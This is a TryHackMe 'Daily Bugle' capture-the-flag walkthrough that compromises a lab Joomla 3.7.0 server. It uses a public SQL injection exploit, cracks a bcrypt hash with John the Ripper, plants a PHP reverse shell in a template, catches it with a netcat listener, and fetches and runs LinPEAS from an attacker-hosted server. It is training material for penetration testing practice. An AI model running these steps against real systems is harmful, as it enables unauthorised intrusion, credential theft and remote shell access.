TryHackMe: Daily Bugle (OSCP approved tools)

This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack the hash obtained using John the Ripper and escalate our privileges with the help of LinPEAS.

Tools:

Public Python Script
John the Ripper
LinPEAS.sh

https://tryhackme.com/room/dailybugle

First, we start with a basic nmap scan that shows we have SSH, HTTP, and SQL ports open.

-vv flag: very verbose. Good for being able to see status and progress.
-Pn flag: tells nmap to skip the discovery phase. We know the server is up and may not be responding to pings.

nmap -vv -Pn 10.10.52.102

First, we will look at the web server running on port 80 by navigating to http://10.10.52.201 on a web browser. Some enumeration indicates the site is using Joomla CMS. To determine which version is running, we can navigate to the following path /administrator/manifests/files/joomla.xml.

Now that we know we are working with Joomla version 3.7.0, we can research publicly available exploits for this version and discover that it is vulnerable to SQL Injection (CVE-2017–8917). Instead of using SQLMap (not allowed on OSCP), I decided to use a python script named Joomblah.py

https://github.com/stefanlucas/Exploit-Joomla

This script is easy to use, all you have to provide is the URL. (Note: Ensure you are running this using Python2 or you will receive errors)

python2 joomblah.py http://10.10.52.102

Now that we have a hash, we need to crack it using John the Ripper. First, to figure out we are using a bcrypt hash we need to do some research on the formatting.

john jonahHash --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

A few minutes later, John cracked the password. Now, we need to find what to do with the password. Trying the username and password with SSH did not work(testing for password reuse), so we pivot to log into the Joomla CMS admin panel (since the creds came from the Joomla Database)

Navigating to http://10.10.52.102/administrator/ shows an admin panel that we can use to log in. Using Jonah’s creds, we can log in. After looking around, we can see in the templates functionality we can edit PHP templates.

I took this template, copy +pasted Pen Test Monkey’s PHP reverse shell then saved the file. https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php (Note: Ensure you change the IP and Port to match yours when you upload.)

Once you have the shell opened, open a netcat listener with nc -nlvp 1234 and navigate to the index.php page within the Joomla CMS. You will get a callback to your listener running as user Apache.

Now that we have our initial shell, we need to laterally move to another user, jjameson. This other user can be found by searching the home directory with ls /home/.

First, we will get linpeas.sh on the system using wget. Host a Python Simple HTTP server within the directory you have the linpeas.sh script on your local machine (python3 -m http.server).

Since we are running as Apache user, we most likely have read, write, execute permissions on the /var/www/html directory so we will save the linpeas.sh script there.

wget http://10.9.201.84:8000/linpeas.sh
chmod 777 linpeas.sh

Now we can run this script using the command ./linpeas.sh. After some output, we can see some interesting things. Most importantly, we see a password within a PHP config file.

We try to use this new password to SSH into the system with username jjameson and we are able to login and read the user.txt file.

Now we need to escalate to root. We will run the LinPEAS.sh script again from the user of jjameson and provide LinPEAS.sh the password. We can use the same LinPEAS.sh script from before in /var/www/html/linpeas.sh. A new thing jumps out that jjameson can run yum as sudo.